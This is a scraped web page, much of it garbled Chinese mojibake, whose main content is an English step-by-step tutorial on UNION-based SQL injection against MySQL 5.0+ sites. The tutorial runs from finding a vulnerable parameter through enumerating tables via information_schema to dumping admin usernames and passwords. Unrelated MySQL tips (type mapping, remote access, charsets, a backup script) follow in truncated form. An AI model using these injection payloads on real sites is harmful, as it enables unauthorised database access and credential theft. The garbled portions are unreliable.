Ò׽ؽØÍ¼Èí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

[Injection]¶ÔMYSQL 5.0·þÎñÆ÷ÒÔÉϰ汾עÈë


by ZaraByte
How to do a SQL Injection for MYSQL Server 5.0+
1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
2. order by #–
Keep upping the # until you get an error.
3. union all select 1,#,#,#,#,#–
Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them
4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2
5. concat_ws(0×3A,version(),@@version) in vulnerable column
add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version
Will show the version of the SQL Server recommended that it be 5.0
6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–
This selects all the the tables from the database.
7. Find a table your after like admin or like users or user whatever table you wanna see
8. union all select 1,group_concat(column_name),#,#,#,# from information_schema.columns where table_name=char(x)–
Replace x with the ASCII of table name You will need to convert Text to ASCII.
9. union all select 1,group_concat(table_name,0×3a,table_name)#,#,#,# from column_name–
Replace table_name with the table name your after the 0×3a is hex for “:” table_name would be replaced with the other table name yours after
so for example say you found a table named admin and you wanna see the username and password columns you’d do
union all select 1,group_concat(username,0×3a,password,0×3c62723e)#,#,#,# from table_name–
Basically its going to show the username 0×3a is hex for “:” then the password 0×3c62723e is hex for a “< br >” which breaks them


Ïà¹ØÎĵµ£º

MySQLÓëOracleÊý¾ÝÀàÐÍת»»


MySQL Data Type
Oracle Data Type
BIGINT
NUMBER(19, 0)
BIT
RAW
BLOB
BLOB, RAW
CHAR
CHAR
DATE
DATE
DATETIME
DATE
DECIMAL
FLOAT (24)
DOUBLE
FLOAT (24)
DOUBLE PRECISION
FLOAT (24)
ENUM
VARCHAR2
FLOAT
FLOAT
INT
NUMBER(10, 0)
INTEGER
NUMBER(10, 0)
LONGBLOB
BLOB, RAW
LONGTEX ......

½â¾öMySQL²»ÔÊÐí´ÓÔ¶³Ì·ÃÎʵķ½·¨

½â¾öMySQL²»ÔÊÐí´ÓÔ¶³Ì·ÃÎʵķ½·¨
2009-06-04 13:11
1¡£ ¸Ä±í·¨¡£¿ÉÄÜÊÇÄãµÄÕʺŲ»ÔÊÐí´ÓÔ¶³ÌµÇ½£¬Ö»ÄÜÔÚlocalhost¡£Õâ¸öʱºòÖ»ÒªÔÚlocalhostµÄÄÇ̨µçÄÔ£¬µÇÈëmysqlºó£¬¸ü¸Ä "mysql" Êý¾Ý¿âÀïµÄ "user" ±íÀïµÄ "host" Ï´Ó"localhost"¸Ä³Æ"%"
Sql´úÂë ¸´ÖÆ´úÂë
   1. mysql -u root -pvmwaremysql>us ......

²é¿´ MySql ×Ö·û¼¯

¹Ø¼ü×Ö: mysql


MySQL ÂÒÂëµÄ¸ùÔ´ÊÇµÄ MySQL ×Ö·û¼¯ÉèÖò»µ±µÄÎÊÌ⣬±¾ÎÄ»ã×ÜÁËÓйز鿴 MySQL ×Ö·û¼¯µÄÃüÁî¡£°üÀ¨²é¿´ MySQL Êý¾Ý¿â·þÎñÆ÷×Ö·û¼¯¡¢²é¿´ MySQL Êý¾Ý¿â×Ö·û¼¯£¬ÒÔ¼°Êý¾Ý±íºÍ×ֶεÄ×Ö·û¼¯¡¢µ±Ç°°²×°µÄ MySQL ËùÖ§³ÖµÄ×Ö·û¼¯µÈ¡£
Ò»¡¢²é¿´ MySQL Êý¾Ý¿â·þÎñÆ÷ºÍÊý¾Ý¿â×Ö·û¼¯¡£
mysql> show variab ......

Mysql for linux mysql×Ô¶¯±¸·Ý½Å±¾

¿ÉÒÔ½«Õâ¸ö½Å±¾·Å½øcrontab£¬ËûµÄÅäÖÆÎļþÔÚ /etc/crontabÖÐÿÌìÁ賿ִÐÐÒ»´Î£¬×Ô¶¯±¸·Ý Õâ¸ö½Å±¾Ã¿Ìì×î¶àÖ»Ö´ÐÐÒ»´Î£¬¶øÇÒÖ»±£Áô×î½üÎåÌìµÄ±¸·ÝÔÚ·þÎñÆ÷ÉÏ¡£
#!/bin/bash
#This is a ShellScript For Auto DB Backup
#Powered by aspbiz
#2004-09
#Setting
#ÉèÖÃÊý¾Ý¿âÃû£¬Êý¾Ý¿âµÇ¼Ãû£¬ÃÜÂ룬±¸·Ý·¾¶£¬ÈÕ־ ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØÍ¼ | ¸ÓICP±¸09004571ºÅ